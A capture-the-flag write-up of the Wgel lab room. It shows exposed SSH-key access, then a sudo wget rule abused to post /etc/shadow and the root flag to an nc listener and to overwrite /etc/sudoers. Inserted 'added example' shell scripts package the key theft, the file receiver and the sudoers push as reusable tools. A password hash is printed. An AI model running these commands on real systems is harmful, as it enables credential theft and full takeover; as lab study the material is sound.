Wgel CTF

Salvador Rodríguez
4 min read · Jul 27, 2021

This room is pretty neat. The initial part had me looking for exploits that did not exist, and getting to the last flag was fun. I liked how a single sudo misconfiguration gives up the root flag in multiple ways, one of them without even needing a root shell.

Nmap

sudo nmap -sS -sV -sC -p- -vv -oA scan 10.10.77.137

Output

# Nmap 7.91 scan initiated Mon Jul 26 23:28:56 2021 as: nmap -sS -sV -sC -p- -vv -oA scan 10.10.77.137
Nmap scan report for 10.10.77.137
Host is up, received echo-reply ttl 63 (0.16s latency).
Scanned at 2021-07-26 23:28:56 EDT for 468s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpgV7/18RfM9BJUBOcZI/eIARrxAgEeD062pw9L24Ulo5LbBeuFIv7hfRWE/kWUWdqHf082nfWKImTAHVMCeJudQbKtL1SBJYwdNo6QCQyHkHXslVb9CV1Ck3wgcje8zLbrml7OYpwBlumLVo2StfonQUKjfsKHhR+idd3/P5V3abActQLU8zB0a4m3TbsrZ9Hhs/QIjgsEdPsQEjCzvPHhTQCEywIpd/GGDXqfNPB0Yl/dQghTALyvf71EtmaX/fsPYTiCGDQAOYy3RvOitHQCf4XVvqEsgzLnUbqISGugF8ajO5iiY2GiZUUWVn4MVV1jVhfQ0kC3ybNrQvaVcXd
| 256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDCxodQaK+2npyk3RZ1Z6S88i6lZp2kVWS6/f955mcgkYRrV1IMAVQ+jRd5sOKvoK8rflUPajKc9vY5Yhk2mPj8=
| 256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJhXt+ZEjzJRbb2rVnXOzdp5kDKb11LfddnkcyURkYke
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 26 23:36:44 2021 -- 1 IP address (1 host up) scanned in 468.71 seconds

Gobuster

Note: use the /dirb/common.txt wordlist for the second scan as well.

sudo gobuster dir -u http://10.10.77.137/ -w /usr/share/wordlists/dirb/common.txt -o diretorios.txt -k

Output

/sitemap (Status: 301) [Size: 314] [--> http://10.10.77.137/sitemap/]

Second scan, against /sitemap/

sudo gobuster dir -u http://10.10.77.137/sitemap/ -w /usr/share/wordlists/dirb/common.txt -o diretorios2.txt -k

Output

/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.ssh (Status: 301) [Size: 319] [--> http://10.10.77.137/sitemap/.ssh/]
/css (Status: 301) [Size: 318] [--> http://10.10.77.137/sitemap/css/]
/fonts (Status: 301) [Size: 320] [--> http://10.10.77.137/sitemap/fonts/]
/images (Status: 301) [Size: 321] [--> http://10.10.77.137/sitemap/images/]
/index.html (Status: 200) [Size: 21080]
/js (Status: 301) [Size: 317] [--> http://10.10.77.137/sitemap/js/]

Initial Access

While waiting for gobuster's second scan to finish, I explored the site under /sitemap/, and a quick search showed that Unapp is a theme from Colorlib. From that finding I went looking for exploits and CVEs, but sadly found nothing useful. I tried the "contact us" button hoping it would leak a username, got nothing, and then turned to the source code; I gave up on that quickly, since the code looked fresh out of the box from the template. At that point I went back to the default Apache page, and that is where I found the following.

Ha! So we now have our user: jessie.

gobuster also turned up an interesting directory called .ssh, so yeah…you can guess what is in there: an SSH private key (id_rsa), served straight out of the web root.

So now we can use this key to log in as jessie.

If ssh refuses the key with "Permissions 0644 for 'id_rsa' are too open" (it ignores a private key that other users can read), tighten the file permissions first:

sudo chmod 400 id_rsa
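The whole path from the exposed .ssh directory to a shell, as an added example rather than code from the original writeup: fetch the key, confirm it really is a private key, clamp its permissions so ssh accepts it, and connect as jessie. The key URL (http://10.10.77.137/sitemap/.ssh/id_rsa) is an assumption, since the writeup shows only the directory listing and the local file name; the script also assumes GNU coreutils for stat -c.

```shell
#!/bin/sh
# Added example, not part of the original writeup.
# Assumes the key is exposed at $KEY_URL (the writeup shows only the .ssh directory
# and the local file name id_rsa) and GNU coreutils (stat -c).
KEY_URL=${KEY_URL:-http://10.10.77.137/sitemap/.ssh/id_rsa}
TARGET_USER=${TARGET_USER:-jessie}
TARGET_HOST=${TARGET_HOST:-10.10.77.137}

# Succeeds only if the file starts with a PEM private-key header, i.e.
# "-----BEGIN OPENSSH PRIVATE KEY-----" or the older "-----BEGIN RSA PRIVATE KEY-----".
looks_like_private_key() {
    head -n 1 "$1" | grep -q '^-----BEGIN .*PRIVATE KEY-----$'
}

# Octal mode of a file, e.g. 644.
file_mode() {
    stat -c '%a' "$1"
}

# ssh ignores a private key that other users can read ("Permissions 0644 for
# 'id_rsa' are too open"), so restrict it to the owner and report the new mode.
secure_key() {
    chmod 400 "$1" && file_mode "$1"
}

# Download the key from the web server to a local path.
fetch_key() {
    wget -q -O "$2" "$1"
}

# Sanity-check the key, fix its mode, then log in with it.
connect() {
    key=$1
    looks_like_private_key "$key" || { echo "$key is not a PEM private key" >&2; return 1; }
    [ "$(secure_key "$key")" = 400 ] || { echo "could not fix permissions on $key" >&2; return 1; }
    ssh -i "$key" "$TARGET_USER@$TARGET_HOST"
}

# Usage (only when invoked as a script with "run"):  sh get_shell.sh run
if [ "${1:-}" = run ]; then
    fetch_key "$KEY_URL" ./id_rsa && connect ./id_rsa
fi
```

If the key had a passphrase, ssh would prompt for it; the one in this room does not, and if it did, ssh2john and john would be the next step.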

User flag

location: /home/jessie/Documents

Privesc

Checking what jessie is allowed to run as root

sudo -l

shows the following rule

(root) NOPASSWD: /usr/bin/wget

Being able to run wget as root opens up some pretty interesting options: wget then reads and writes files with root's privileges, so we can send any file from this machine to ours (--post-file), or pull a file onto the machine and write it anywhere we like, as root (--output-document).

To test this I decided to pull /etc/shadow. The jessie account cannot read that file, but the sudo rule lets wget read it as root and POST it to a listener on my machine.

Attacker

sudo nc -lnvp 1234

Target

sudo wget --post-file=/etc/shadow 10.9.148.82:1234

and voilà

root:!:18195:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:17954:0:99999:7:::
uuidd:*:17954:0:99999:7:::
lightdm:*:17954:0:99999:7:::
whoopsie:*:17954:0:99999:7:::
avahi-autoipd:*:17954:0:99999:7:::
avahi:*:17954:0:99999:7:::
dnsmasq:*:17954:0:99999:7:::
colord:*:17954:0:99999:7:::
speech-dispatcher:!:17954:0:99999:7:::
hplip:*:17954:0:99999:7:::
kernoops:*:17954:0:99999:7:::
pulse:*:17954:0:99999:7:::
rtkit:*:17954:0:99999:7:::
saned:*:17954:0:99999:7:::
usbmux:*:17954:0:99999:7:::
jessie:$6$0wv9XLy.$HxqSdXgk7JJ6n9oZ9Z52qxuGCdFqp0qI/9X.a4VRJt860njSusSuQ663bXfIV7y.ywZxeOinj4Mckj8/uvA7U.:18195:0:99999:7:::
sshd:*:18195:0:99999:7:::

This is where things get funny. Since we could pull that file, we can just as easily pull the root flag. Using the same file-name pattern as the user flag, the command becomes

sudo wget --post-file=/root/root_flag.txt 10.9.148.82:1234
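A small receiver for the --post-file trick used above, added here as an example and not part of the original writeup. wget wraps the file in an HTTP POST, so what nc prints is the request line, the headers, a blank line and then the raw file; the helper strips the headers, checks the byte count against Content-Length, and names the saved file after the URL path the target posted to. It assumes GNU sed and a netcat that accepts -l -n -p (nc.traditional or ncat); the target-side command it prints adds -T 5 -t 1 so wget stops waiting for a reply after five seconds without retrying, which closes the connection and lets nc exit on its own.

```shell
#!/bin/sh
# Added example, not part of the original writeup.
# Assumes GNU sed and a netcat that accepts -l -n -p (nc.traditional or ncat).

# Print only the request body: delete everything from the request line through
# the first blank line. wget ends header lines with CRLF, so allow an optional \r.
strip_http_headers() {
    sed '1,/^\r\{0,1\}$/d'
}

# First Content-Length header of the request on stdin; 0 if there is none.
content_length() {
    len=$(sed -n 's/^[Cc]ontent-[Ll]ength: *\([0-9]*\)\r\{0,1\}$/\1/p' | head -n 1)
    echo "${len:-0}"
}

# URL path from the request line ("POST /shadow HTTP/1.1" -> "/shadow").
request_path() {
    sed -n '1s/^POST \([^ ]*\) HTTP.*$/\1/p'
}

# Command to run on the target: post file $1 to our listener at $2:$3, naming the
# URL after the file so the receiver knows what arrived. -T 5 -t 1 makes wget give
# up waiting for a reply after 5 s without retrying, which closes the connection.
target_cmd() {
    printf 'sudo wget -q -T 5 -t 1 --post-file=%s http://%s:%s/%s\n' \
        "$1" "$2" "$3" "$(basename "$1")"
}

# Listen once on port $1, save the posted file under directory $2, verify the size.
recv_file() {
    raw=$(mktemp)
    nc -lnp "$1" > "$raw"
    name=$(basename "$(request_path < "$raw")")
    case $name in ''|/|.|..) name=post.bin ;; esac
    out="$2/$name"
    strip_http_headers < "$raw" > "$out"
    expected=$(content_length < "$raw")
    actual=$(wc -c < "$out")
    rm -f "$raw"
    if [ "$expected" -eq "$actual" ]; then
        echo "saved $actual bytes to $out"
    else
        echo "size mismatch for $out: Content-Length $expected, received $actual" >&2
        return 1
    fi
}

# Usage:  sh recv.sh run 1234 /tmp/loot     (then run the printed command on the target)
if [ "${1:-}" = run ]; then
    target_cmd /etc/shadow 10.9.148.82 "$2"
    recv_file "$2" "$3"
fi
```

The size check matters more than it looks: if you Ctrl-C nc early or the connection drops, a truncated shadow file still looks plausible in a terminal, and the mismatch is the only thing that tells you so.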

Root shell

Even though we already have the flag, we clearly have not pwned the system yet, so let's do that. This time we go the other way and upload a file.

In /etc there is a file called sudoers, which specifies who may use sudo and how. What if we write our own and drop it onto the box with the wget rule?

Create a file called sudoers with the following line (keep a trailing newline; sudo rejects the whole file on a syntax error, which would lock everyone, including us, out of sudo)

jessie  ALL=(ALL) NOPASSWD: ALL

then, let’s start an HTTP server on our machine.

sudo python3 -m http.server 81

Now pull it onto the target, writing it over /etc/sudoers. Since a file with that name already exists, the output-document option matters: wget then truncates and rewrites that path in place, so the file keeps its root ownership and 0440 mode, which sudo checks. Giving the absolute path avoids depending on the current directory.

sudo wget http://10.9.148.82:81/sudoers --output-document=/etc/sudoers

Then just run a

sudo su

And our job here is done.
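Building and checking the replacement sudoers before serving it, as an added example and not part of the original writeup. Overwriting /etc/sudoers in place keeps the file's ownership and mode, but the single line above throws away whatever else the original contained (on Ubuntu that includes the Defaults lines and the #includedir /etc/sudoers.d directive), and a syntax error disables sudo for every user on the box. The helper therefore appends the rule to a copy of the original sudoers if you have pulled one with the --post-file trick, guarantees a trailing newline, and runs visudo -c -f on the result when visudo is installed locally. The attacker address and port 81 are the writeup's; the script and file names are my own.

```shell
#!/bin/sh
# Added example, not part of the original writeup. File names are mine; the
# attacker address and port 81 come from the writeup. Assumes GNU coreutils.
ATTACKER=${ATTACKER:-10.9.148.82}
PORT=${PORT:-81}

# The rule that gives user $1 password-less sudo for everything.
sudo_rule() {
    printf '%s ALL=(ALL) NOPASSWD: ALL\n' "$1"
}

# Write sudoers file $2 for user $1. If $3 is a copy of the target's original
# /etc/sudoers (pulled with the --post-file trick), keep it and append the rule;
# otherwise the file holds only the rule. The result always ends with a newline.
make_sudoers() {
    user=$1 out=$2 orig=${3:-}
    if [ -n "$orig" ]; then
        cat "$orig" > "$out"
        # make sure the original ends with a newline before appending to it
        [ "$(tail -c 1 "$out" | wc -l)" -eq 1 ] || printf '\n' >> "$out"
    else
        : > "$out"
    fi
    sudo_rule "$user" >> "$out"
    chmod 440 "$out"
}

# Syntax-check with visudo when it is available. A parse error in the real file
# disables sudo for every user on the target, so never upload an unchecked file.
# Older visudo versions also complain about the owner/mode of the local copy;
# only the "parsed OK" verdict matters here.
validate_sudoers() {
    if command -v visudo > /dev/null 2>&1; then
        visudo -c -f "$1"
    else
        echo "visudo not installed here, skipping syntax check of $1" >&2
    fi
}

# Commands to type on the target. -O on an existing path truncates and rewrites
# that file in place, so /etc/sudoers keeps root ownership and mode 0440.
target_cmds() {
    printf 'sudo wget -q http://%s:%s/sudoers -O /etc/sudoers\n' "$ATTACKER" "$PORT"
    printf 'sudo -l\n'
    printf 'sudo su\n'
}

# Usage:  sh push_sudoers.sh run jessie [copy_of_original_sudoers]
if [ "${1:-}" = run ]; then
    make_sudoers "$2" ./sudoers "${3:-}"
    validate_sudoers ./sudoers || exit 1
    target_cmds
    sudo python3 -m http.server "$PORT"   # serves ./sudoers from the current directory
fi
```

Running sudo -l on the target after the upload is the cheap check that the new file parsed: if it prints the ALL rule, sudo su follows; if it prints a parse error, the original file is gone and the wget rule with it, so get the file right before pushing it.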

Root flag

location: /root
